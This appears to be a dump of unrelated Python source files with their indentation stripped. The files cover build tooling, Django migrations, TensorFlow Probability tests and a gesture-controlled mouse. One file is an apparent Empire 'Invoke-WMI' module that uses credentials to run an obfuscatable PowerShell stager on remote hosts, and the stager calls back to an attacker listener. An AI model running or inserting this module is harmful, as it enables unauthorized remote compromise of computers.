for idx, i in enumerate(parameter_list):
if i[:2] == '-I' or i[:2] == '-L':
parameter_list[idx] = i[:2] + os.path.normpath(os.path.join(build_dir, i[2:]))
return parameter_list
def build_rpath_args(self, build_dir, from_dir, rpath_paths, build_rpath, install_rpath):
return self.build_unix_rpath_args(build_dir, from_dir, rpath_paths, build_rpath, install_rpath)
def get_optimization_args(self, optimization_level):
return gnu_optimization_args[optimization_level]
class LLVMDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'llvm'
self.base_options = ['b_coverage', 'b_colorout', 'b_vscrt']
def get_colorout_args(self, colortype):
if colortype == 'always':
return ['-enable-color']
return []
def get_warn_args(self, level):
if level == '2' or level == '3':
return ['-wi', '-dw']
elif level == '1':
return ['-wi']
else:
return []
def get_buildtype_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args() + d_ldc_buildtype_args[buildtype]
return d_ldc_buildtype_args[buildtype]
def get_pic_args(self):
return ['-relocation-model=pic']
def get_crt_link_args(self, crt_val, buildtype):
return self.get_crt_args(crt_val, buildtype)
@classmethod
def unix_args_to_native(cls, args):
return cls.translate_args_to_nongnu(args)
def get_optimization_args(self, optimization_level):
return ldc_optimization_args[optimization_level]
class DmdDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'dmd'
self.base_options = ['b_coverage', 'b_colorout', 'b_vscrt']
def get_colorout_args(self, colortype):
if colortype == 'always':
return ['-color=on']
return []
def get_buildtype_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args() + d_dmd_buildtype_args[buildtype]
return d_dmd_buildtype_args[buildtype]
def get_std_exe_link_args(self):
if is_windows():
# DMD links against D runtime only when main symbol is found,
            # so these need to be inserted when linking static D libraries.
if self.arch == 'x86_64':
return ['phobos64.lib']
elif self.arch == 'x86_mscoff':
return ['phobos32mscoff.lib']
return ['phobos.lib']
return []
def get_std_shared_lib_link_args(self):
libname = 'libphobos2.so'
if is_windows():
if self.arch == 'x86_64':
libname = 'phobos64.lib'
elif self.arch == 'x86_mscoff':
libname = 'phobos32mscoff.lib'
else:
libname = 'phobos.lib'
return ['-shared', '-defaultlib=' + libname]
def get_target_arch_args(self):
        # DMD32 and DMD64 on 64-bit Windows default to 32-bit (OMF).
# Force the target to 64-bit in order to stay consistent
# across the different platforms.
if is_windows():
if self.arch == 'x86_64':
return ['-m64']
elif self.arch == 'x86_mscoff':
return ['-m32mscoff']
return ['-m32']
return []
def get_crt_compile_args(self, crt_val, buildtype):
return self.get_crt_args(crt_val, buildtype)
@classmethod
def unix_args_to_native(cls, args):
return cls.translate_args_to_nongnu(args)
def get_optimization_args(self, optimization_level):
return dmd_optimization_args[optimization_level]
|
py | 1a37c6b7d069d77e0623fa248d80c525550f39f3 | from django.apps.registry import Apps
from django.db import DatabaseError, models
from django.utils.functional import classproperty
from django.utils.timezone import now
from .exceptions import MigrationSchemaMissing
class MigrationRecorder:
"""
Deal with storing migration records in the database.
Because this table is actually itself used for dealing with model
creation, it's the one thing we can't do normally via migrations.
We manually handle table creation/schema updating (using schema backend)
and then have a floating model to do queries with.
If a migration is unapplied its row is removed from the table. Having
a row in the table always means a migration is applied.
"""
_migration_class = None
@classproperty
def Migration(cls):
"""
Lazy load to avoid AppRegistryNotReady if installed apps import
MigrationRecorder.
"""
if cls._migration_class is None:
class Migration(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField(default=now)
class Meta:
apps = Apps()
app_label = 'migrations'
db_table = 'django_migrations'
def __str__(self):
return 'Migration %s for %s' % (self.name, self.app)
cls._migration_class = Migration
return cls._migration_class
def __init__(self, connection):
self.connection = connection
@property
def migration_qs(self):
return self.Migration.objects.using(self.connection.alias)
def has_table(self):
"""Return True if the django_migrations table exists."""
with self.connection.cursor() as cursor:
tables = self.connection.introspection.table_names(cursor)
return self.Migration._meta.db_table in tables
def ensure_schema(self):
"""Ensure the table exists and has the correct schema."""
# If the table's there, that's fine - we've never changed its schema
# in the codebase.
if self.has_table():
return
# Make the table
try:
with self.connection.schema_editor() as editor:
editor.create_model(self.Migration)
except DatabaseError as exc:
raise MigrationSchemaMissing("Unable to create the django_migrations table (%s)" % exc)
def applied_migrations(self):
"""
Return a dict mapping (app_name, migration_name) to Migration instances
for all applied migrations.
"""
if self.has_table():
return {(migration.app, migration.name): migration for migration in self.migration_qs}
else:
# If the django_migrations table doesn't exist, then no migrations
# are applied.
return {}
def record_applied(self, app, name):
"""Record that a migration was applied."""
self.ensure_schema()
self.migration_qs.create(app=app, name=name)
def record_unapplied(self, app, name):
"""Record that a migration was unapplied."""
self.ensure_schema()
self.migration_qs.filter(app=app, name=name).delete()
def flush(self):
"""Delete all migration records. Useful for testing migrations."""
self.migration_qs.all().delete()
|
py | 1a37c7ba2d228caef670de2aefc502f114329be0 | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2NetworkInterface(ModelElement):
"""
    EC2 network interface model element
"""
def __init__(self, cfn_model):
"""
Initialize
:param cfn_model:
"""
ModelElement.__init__(self, cfn_model)
        self.groupSet = []
        self.ipv6Addresses = []
        self.privateIpAddresses = []
        self.tags = []
        self.security_groups = []
self.resource_type = 'AWS::EC2::NetworkInterface'
|
py | 1a37c84094316db24fcdcfa44f64bb522df9d49f | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using WMI.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
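        # Base WMI process-creation call; ComputerName, ArgumentList and
        # Credential options are appended to this string below.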
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print(helpers.color("[!] CredID is invalid!"))
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if domainName != "":
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
else:
self.options["UserName"]['Value'] = str(userName)
if password != "":
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
# build the WMI execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ArgumentList \"" + stagerCode + "\""
# if we're supplying alternate user credentials
if userName != '':
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
py | 1a37c977bee3a9087e7b147b41fa864c5f30dd78 | import numpy as np,pandas as pd
def generate_data(POINTS_PER_CLUSTER,CLUSTERS):
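    """Return x/y lists for CLUSTERS groups of POINTS_PER_CLUSTER points.
    Cluster i is offset by 4*i along x and by a random integer in [-50, 50)
    along y, with uniform noise of width 2 added to each coordinate.
    """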
data_x = []
data_y = []
for i in range(CLUSTERS):
noise_y = 2*np.random.rand(POINTS_PER_CLUSTER)
noise_x = 2*np.random.rand(POINTS_PER_CLUSTER)
temp_x = 4*i
temp_y = np.random.randint(-50,50)
for j in range(POINTS_PER_CLUSTER):
data_x.append(noise_x[j]+temp_x)
data_y.append(noise_y[j]+temp_y)
return data_x,data_y
|
py | 1a37c9e2961ce2be745779807de472a59bf35d97 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the LKJ distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.distributions.internal import statistical_testing as st
tfd = tfp.distributions
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
def _det_ok_mask(x, det_bounds, input_output_cholesky=False):
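  # Float mask over the batch: 1 where det(x) exceeds det_bounds, else 0.
  # For Cholesky-factor input, log|det| is twice the sum of the log diagonals.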
if input_output_cholesky:
logdet = 2.0 * tf.reduce_sum(
input_tensor=tf.math.log(tf.linalg.diag_part(x)), axis=[-1])
else:
_, logdet = tf.linalg.slogdet(x)
return tf.cast(tf.exp(logdet) > det_bounds, dtype=x.dtype)
# Each leaf entry here is a confidence interval for the volume of some
# set of correlation matrices. To wit, k-by-k correlation matrices
# whose determinant is at least d appear as volume_bounds[k][d].
# These particular confidence intervals were estimated by the
# Clopper-Pearson method applied to 10^7 rejection samples, with an
# error probability of 5e-7. This computation may be performed by
# executing the correlation_matrix_volumes program with argument
# --num_samples 1e7. Doing so took about 45 minutes on a standard
# workstation.
volume_bounds = {
3: {0.01: (04.8334339757361420, 4.845866340472709),
0.25: (02.9993127232473036, 3.011629093880439),
0.30: (02.6791373340121916, 2.691146382760893),
0.35: (02.3763254004846030, 2.3879545568875358),
0.40: (02.0898224112869355, 2.1010041316917913),
0.45: (01.8202389505755674, 1.8309117190894892)},
4: {0.01: (10.983339932556953, 11.060156130783517),
0.25: (03.4305021152837020, 3.4764695469900464),
0.30: (02.6624323207206930, 2.703204389589173),
0.35: (02.0431263321809440, 2.0790437132708752),
0.40: (01.5447440594930320, 1.5761221057556805),
0.45: (01.1459065289947180, 1.1730410135527702)},
5: {0.01: (19.081135276668707, 19.523821224876603),
0.20: (02.8632254471072285, 3.0376848112309776),
0.25: (01.8225680180604158, 1.9623522646052605),
0.30: (01.1299612119639912, 1.2406126830051296),
0.35: (00.6871928383147943, 0.7740705901566753),
0.40: (00.4145900446719042, 0.482655106057178)}}
@test_util.run_all_in_graph_and_eager_modes
@parameterized.parameters(np.float32, np.float64)
class LKJTest(parameterized.TestCase, tf.test.TestCase):
def testNormConst2D(self, dtype):
expected = 2.
# 2x2 correlation matrices are determined by one number between -1
# and 1, so the volume of density 1 over all of them is 2.
answer = self.evaluate(tfd.LKJ(2, dtype([1.]))._log_normalization())
self.assertAllClose(answer, np.log([expected]))
def testNormConst3D(self, dtype):
expected = np.pi**2 / 2.
# 3x3 correlation matrices are determined by the three
# lower-triangular entries. In addition to being between -1 and
# 1, they must also obey the constraint that the determinant of
# the resulting symmetric matrix is non-negative. The post
# https://psychometroscar.com/the-volume-of-a-3-x-3-correlation-matrix/
# derives (with elementary calculus) that the volume of this set
# (with respect to Lebesgue^3 measure) is pi^2/2. The same result
# is also obtained by Rousseeuw, P. J., & Molenberghs,
# G. (1994). "The shape of correlation matrices." The American
# Statistician, 48(4), 276-279.
answer = self.evaluate(tfd.LKJ(3, dtype([1.]))._log_normalization())
self.assertAllClose(answer, np.log([expected]))
def _testSampleLogProbExact(self,
concentrations,
det_bounds,
dim,
means,
num_samples=int(1e5),
dtype=np.float32,
target_discrepancy=0.1,
input_output_cholesky=False,
seed=42):
# For test methodology see the comment in
# _testSampleConsistentLogProbInterval, except that this test
# checks those parameter settings where the true volume is known
# analytically.
concentration = np.array(concentrations, dtype=dtype)
det_bounds = np.array(det_bounds, dtype=dtype)
means = np.array(means, dtype=dtype)
# Add a tolerance to guard against some of the importance_weights exceeding
# the theoretical maximum (importance_maxima) due to numerical inaccuracies
# while lower bounding the determinant. See corresponding comment in
# _testSampleConsistentLogProbInterval.
high_tolerance = 1e-6
testee_lkj = tfd.LKJ(
dimension=dim,
concentration=concentration,
input_output_cholesky=input_output_cholesky,
validate_args=True)
x = testee_lkj.sample(num_samples, seed=seed)
importance_weights = (
tf.exp(-testee_lkj.log_prob(x)) * _det_ok_mask(x, det_bounds,
input_output_cholesky))
importance_maxima = (1. / det_bounds) ** (concentration - 1) * tf.exp(
testee_lkj._log_normalization())
chk1 = st.assert_true_mean_equal_by_dkwm(
importance_weights, low=0., high=importance_maxima + high_tolerance,
expected=means, false_fail_rate=1e-6)
chk2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=0.,
high=importance_maxima + high_tolerance,
false_fail_rate=1e-6,
false_pass_rate=1e-6), dtype(target_discrepancy))
self.evaluate([chk1, chk2])
def testSampleConsistentLogProb2(self, dtype):
concentrations = np.array([
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00])
det_bounds = np.array([
0.01, 0.25, 0.30, 0.40, 0.50, 0.50, 0.50, 0.70, 0.70])
exact_volumes = 2 * np.sqrt(1. - det_bounds)
for input_output_cholesky in [True, False]:
self._testSampleLogProbExact(
concentrations,
det_bounds,
2,
exact_volumes,
num_samples=int(1.1e5),
dtype=dtype,
input_output_cholesky=input_output_cholesky,
target_discrepancy=0.05,
seed=41)
def _testSampleConsistentLogProbInterval(self,
concentrations,
det_bounds,
dim,
num_samples=int(1e5),
dtype=np.float32,
input_output_cholesky=False,
false_fail_rate=1e-6,
target_discrepancy=0.1,
seed=42):
# Consider the set M of dim x dim correlation matrices whose
# determinant exceeds some bound (rationale for bound forthwith).
# - This is a (convex!) shape in dim * (dim - 1) / 2 dimensions
# (because a correlation matrix is determined by its lower
# triangle, and the main diagonal is all 1s).
# - Further, M is contained entirely in the [-1,1] cube,
# because no correlation can fall outside that interval.
#
# We have two different ways to estimate the volume of M:
# - Importance sampling from the LKJ distribution
# - Importance sampling from the uniform distribution on the cube
#
# This test checks that these two methods agree. However, because
# the uniform proposal leads to many rejections (thus slowness),
# those volumes are computed offline and the confidence intervals
# are presented to this test procedure in the "volume_bounds"
# table.
#
# Why place a lower bound on the determinant? Because for eta > 1,
# the density of LKJ approaches 0 as the determinant approaches 0.
# However, the test methodology requires an upper bound on the
    # importance weights produced. Rejecting matrices with too-small
# determinant (from both methods) allows me to supply that bound.
#
# I considered several alternative regions whose volume I might
# know analytically (without having to do rejection).
# - Option a: Some hypersphere guaranteed to be contained inside M.
# - Con: I don't know a priori how to find a radius for it.
# - Con: I still need a lower bound on the determinants that appear
# in this sphere, and I don't know how to compute it.
# - Option b: Some trapezoid given as the convex hull of the
# nearly-extreme correlation matrices (i.e., those that partition
# the variables into two strongly anti-correclated groups).
# - Con: Would have to dig up n-d convex hull code to implement this.
# - Con: Need to compute the volume of that convex hull.
# - Con: Need a bound on the determinants of the matrices in that hull.
# - Option c: Same thing, but with the matrices that make a single pair
# of variables strongly correlated (or anti-correlated), and leaves
# the others uncorrelated.
# - Same cons, except that there is a determinant bound (which
# felt pretty loose).
lows = [dtype(volume_bounds[dim][db][0]) for db in det_bounds]
highs = [dtype(volume_bounds[dim][db][1]) for db in det_bounds]
concentration = np.array(concentrations, dtype=dtype)
det_bounds = np.array(det_bounds, dtype=dtype)
# Due to possible numerical inaccuracies while lower bounding the
# determinant, the maximum of the importance weights may exceed the
# theoretical maximum (importance_maxima). We add a tolerance to guard
# against this. An alternative would have been to add a threshold while
# filtering in _det_ok_mask, but that would affect the mean as well.
high_tolerance = 1e-6
testee_lkj = tfd.LKJ(
dimension=dim,
concentration=concentration,
input_output_cholesky=input_output_cholesky,
validate_args=True)
x = testee_lkj.sample(num_samples, seed=seed)
importance_weights = (
tf.exp(-testee_lkj.log_prob(x)) * _det_ok_mask(x, det_bounds,
input_output_cholesky))
importance_maxima = (1. / det_bounds) ** (concentration - 1) * tf.exp(
testee_lkj._log_normalization())
check1 = st.assert_true_mean_in_interval_by_dkwm(
samples=importance_weights,
low=0.,
high=importance_maxima + high_tolerance,
expected_low=lows,
expected_high=highs,
false_fail_rate=false_fail_rate)
check2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=0.,
high=importance_maxima + high_tolerance,
false_fail_rate=false_fail_rate,
false_pass_rate=false_fail_rate), dtype(target_discrepancy))
self.evaluate([check1, check2])
def testSampleConsistentLogProbInterval3(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.25, 0.25, 0.30, 0.35, 0.35, 0.35, 0.40, 0.45]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
3,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.11,
seed=40)
def testSampleConsistentLogProbInterval4(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.25, 0.25, 0.30, 0.35, 0.35, 0.35, 0.40, 0.45]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
4,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.22,
seed=39)
def testSampleConsistentLogProbInterval5(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.20, 0.20, 0.25, 0.30, 0.30, 0.30, 0.35, 0.40]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
5,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.41,
seed=37)
def testDimensionGuard(self, dtype):
testee_lkj = tfd.LKJ(
dimension=3, concentration=dtype([1., 4.]), validate_args=True)
with self.assertRaisesRegexp(ValueError, 'dimension mismatch'):
testee_lkj.log_prob(tf.eye(4))
def testZeroDimension(self, dtype):
testee_lkj = tfd.LKJ(
dimension=0, concentration=dtype([1., 4.]), validate_args=True)
results = testee_lkj.sample(sample_shape=[4, 3])
self.assertEqual(results.shape, [4, 3, 2, 0, 0])
def testOneDimension(self, dtype):
testee_lkj = tfd.LKJ(
dimension=1, concentration=dtype([1., 4.]), validate_args=True)
results = testee_lkj.sample(sample_shape=[4, 3])
self.assertEqual(results.shape, [4, 3, 2, 1, 1])
def testMean(self, dtype):
testee_lkj = tfd.LKJ(dimension=3, concentration=dtype([1., 3., 5.]))
num_samples = 20000
results = testee_lkj.sample(sample_shape=[num_samples])
mean = testee_lkj.mean()
self.assertEqual(mean.shape, [3, 3, 3])
check1 = st.assert_true_mean_equal_by_dkwm(
samples=results, low=-1., high=1.,
expected=mean,
false_fail_rate=1e-6)
check2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=-1.,
high=1.,
# Smaller false fail rate because of different batch sizes between
# these two checks.
false_fail_rate=1e-7,
false_pass_rate=1e-6),
# 4% relative error
0.08)
self.evaluate([check1, check2])
class LKJTestGraphOnly(tf.test.TestCase):
def testDimensionGuardDynamicShape(self):
if tf.executing_eagerly():
return
testee_lkj = tfd.LKJ(
dimension=3, concentration=[1., 4.], validate_args=True)
with self.assertRaisesOpError('dimension mismatch'):
self.evaluate(
testee_lkj.log_prob(
tf.compat.v1.placeholder_with_default(tf.eye(4), shape=None)))
if __name__ == '__main__':
tf.test.main()
|
py | 1a37cb21822a4ae0ead574afa44752019ea6f0f0 | #!/usr/bin/env python
# created by Bruce Yuan on 17-11-27
import functools
from inspect import signature
class Check:
"""
这就是让用户自定义check
这样可以方便扩展,想怎么检查参数就怎么检查参数
"""
def check(self, parameter):
pass
def check(**info):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
sig = signature(func)
bound_arguments = sig.bind(*args, **kwargs)
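            # Bind *args/**kwargs to parameter names so each value can be
            # matched to the checker registered for that parameter.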
for name, value in bound_arguments.arguments.items():
                # 'check_class' takes priority, so only one check_class is needed;
                # it applies the same checker to every parameter.
                check_func = (info.get('check_class', None) or info.get(name))()
if isinstance(check_func, Check):
check_func.check(value)
else:
raise Exception(
"your check class must inherit from the base Check class"
)
return func(*args, **kwargs)
return wrapper
return decorator
def main():
    # Custom check classes must inherit from the Check base class
class MyCheck(Check):
def check(self, parameter):
print("this is the {}".format(parameter))
@check(a=MyCheck)
def test(a):
print(a)
test(1)
if __name__ == '__main__':
main()
|
py | 1a37ce7ec058cd5eaee002065d5f68e48bf2092c | import cv2
import mediapipe as mp
import numpy as np
import pyautogui
from google.protobuf.json_format import MessageToDict
from datetime import datetime
import os
from os import path
import time
from tkinter import *
from tkinter import filedialog
from PIL import Image
from PIL import ImageTk
import imutils
import sys
def hands_detection(frame):
global bclick
global xp, yp
global xclick_menique, yclick_menique
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_hands = mp.solutions.hands
color_pointer = (255,255,255)
ANCHO_P=1920
ALTO_P=1080
RATIO=ANCHO_P/ALTO_P
X=100
Y=200
xmano_ant=0
ymano_ant=0
b=3
pyautogui.FAILSAFE=False
with mp_hands.Hands(
static_image_mode=False,
max_num_hands=1,
min_detection_confidence=0.5) as hands:
height, width, _ = frame.shape
frame = cv2.flip(frame, 1)
area_width = width - X*2
area_height = int(area_width/RATIO)
aux = np.zeros(frame.shape, np.uint8)
aux = cv2.rectangle(aux,(X,Y),(X + area_width, Y + area_height), (255, 0, 0),-1)
output=cv2.addWeighted(frame,1,aux,0.7,0)
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
results = hands.process(frame_rgb)
if results.multi_hand_landmarks is not None:
for hand_landmarks in results.multi_hand_landmarks:
# Get hand data
handesness_dict = MessageToDict(results.multi_handedness[0])
# Type of hand (left or right)
type_hand = handesness_dict['classification'][0]['label']
# level of certainty
certainty_score = handesness_dict['classification'][0]['score']
                # Skip this hand if the prediction is not confident enough
if(certainty_score<0.9):
continue
                # Measure the hand landmark positions in pixels
xmano = int(hand_landmarks.landmark[0].x * width)
ymano = int(hand_landmarks.landmark[0].y * height)
xbase = int(hand_landmarks.landmark[4].x * width)
ybase = int(hand_landmarks.landmark[4].y * height)
xindice = int(hand_landmarks.landmark[8].x * width)
yindice = int(hand_landmarks.landmark[8].y * height)
xmedio = int(hand_landmarks.landmark[12].x * width)
ymedio = int(hand_landmarks.landmark[12].y * height)
xanular = int(hand_landmarks.landmark[16].x * width)
yanular = int(hand_landmarks.landmark[16].y * height)
xmenique = int(hand_landmarks.landmark[20].x * width)
ymenique = int(hand_landmarks.landmark[20].y * height)
                # Distances between the thumb tip (base) and each fingertip
xclick_indice = xbase-xindice
yclick_indice = ybase-yindice
xclick_medio = xbase - xmedio
yclick_medio = ybase - ymedio
xclick_menique = xbase - xmenique
yclick_menique = ybase - ymenique
xclick_anular = xbase - xanular
yclick_anular = ybase - yanular
distancia_indice = int((xclick_indice**2 + yclick_indice**2)**(1/2))
distancia_medio = int((xclick_medio ** 2 + yclick_medio ** 2) ** (1 / 2))
distancia_anular = int((xclick_anular ** 2 + yclick_anular ** 2) ** (1 / 2))
distancia_menique = int((xclick_menique ** 2 + yclick_menique ** 2)** (1 / 2))
# Move mouse pointer with both hands
if((xmano<= xmano_ant-b) | (xmano>=xmano_ant+b)):
xmano_ant = xmano
if ((ymano <= ymano_ant - b) | (ymano >= ymano_ant + b)):
ymano_ant = ymano
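                # Map the wrist position inside the on-screen control rectangle
                # to full-screen pixel coordinates.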
xp = np.interp(xmano_ant, (X,X+ area_width), (0,ANCHO_P))
yp = np.interp(ymano_ant, (Y, Y + area_height), (0, ALTO_P))
pyautogui.moveTo(int(xp),int(yp))
# The right hand will have the mouse options
if(type_hand == 'Right'):
# Left click
if(distancia_indice<=50):
if(bclick[0]==False):
print("Click")
pyautogui.leftClick()
bclick[0]=True
if(distancia_indice>=60):
if(bclick[0]==True):
bclick[0]=False
# Middle click
if (distancia_medio<=50):
if (bclick[1] == False):
print("Click")
pyautogui.middleClick()
bclick[1] = True
if (distancia_medio>=60):
if (bclick[1] == True):
bclick[1] = False
# Right click
if (distancia_anular<=50):
if (bclick[2] == False):
print("Click")
pyautogui.rightClick()
bclick[2] = True
if (distancia_anular>=60):
if (bclick[2] == True):
bclick[2] = False
# Drag
if (distancia_menique<=50):
if (bclick[3] == False):
print("Arrastrar")
pyautogui.mouseDown()
bclick[3] = True
else:
pyautogui.moveTo(xp, yp)
if (distancia_menique>=60):
if (bclick[3] == True):
pyautogui.mouseUp()
bclick[3] = False
# The left hand will be able to set audio, brightness, etc
else:
# Volume up
if(distancia_indice<=30):
if(bclick[0]==False):
print("Volume up")
pyautogui.press("volumeup")
bclick[0]=True
if(distancia_indice>=40):
if(bclick[0]==True):
bclick[0]=False
# Screenshot
# image will be save in Images folder, under the present
# hour time name
if (distancia_medio<=50):
if (bclick[1] == False):
print("Screenshot")
now = datetime.now()
print(now.strftime("%d-%m-%Y_%H-%M-%S"))
image_name = folder+"/"+now.strftime("%d-%m-%Y_%H-%M-%S")+".png"
pyautogui.screenshot(image_name)
bclick[1] = True
if (distancia_medio>=60):
if (bclick[1] == True):
bclick[1] = False
# Volume down
if (distancia_anular<=30):
if (bclick[2] == False):
print("Volume down")
pyautogui.press("volumedown")
bclick[2] = True
if (distancia_anular>=40):
if (bclick[2] == True):
bclick[2] = False
                    # Quick canned text reply
if (distancia_menique<=50):
if (bclick[3] == False):
print("Texto")
pyautogui.typewrite("No puedo contestar por el momento, te marco cuanto me desocupe")
bclick[3] = True
if (distancia_menique>=60):
if (bclick[3] == True):
bclick[3] = False
def visualizar(lblVideo):
global cap
global xp, yp
if cap is not None:
ret, frame = cap.read()
if ret == True:
frame = imutils.resize(frame,width=640)
hands_detection(frame)
frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)
im = Image.fromarray(frame)
img = ImageTk.PhotoImage(image=im)
lblVideo.configure(image=img)
lblVideo.image = img
lblVideo.after(1,lambda : visualizar(lblVideo))
else:
lblVideo.image = ""
cap.release()
def iniciar():
global cap
global counter
global bclick
global xp, yp
bclick = np.full((4,1), False)
xp = 0
yp = 0
if counter < 1:
counter+=1
cap = cv2.VideoCapture(0,cv2.CAP_DSHOW)
# Video
video = Toplevel()
lblVideo = Label(video)
lblVideo.grid(column=0,row=0,columnspan=2)
visualizar(lblVideo)
def finalizar():
global cap
if cap is not None:
cap.release()
sys.exit(0)
def main():
global cap
cap = None
global counter
counter = 0
global folder
# Set folder name for screenshots
folder = "./images"
# Check if the folder containing the images exits. If not, create it
if(not path.isdir(folder)):
os.mkdir(folder)
# Start main frame
root = Tk()
root.title('Hands-Free Mouse')
root.iconphoto(False, PhotoImage(file='./icons/icon.png'))
root.geometry('400x300+700+200')
root.configure(bg='black')
# Image
m_im = Image.open("./icons/hand.jpg")
m_im = m_im.resize((300,250), Image.ANTIALIAS)
m_image = ImageTk.PhotoImage(m_im)
main_image = Label(root, image=m_image)
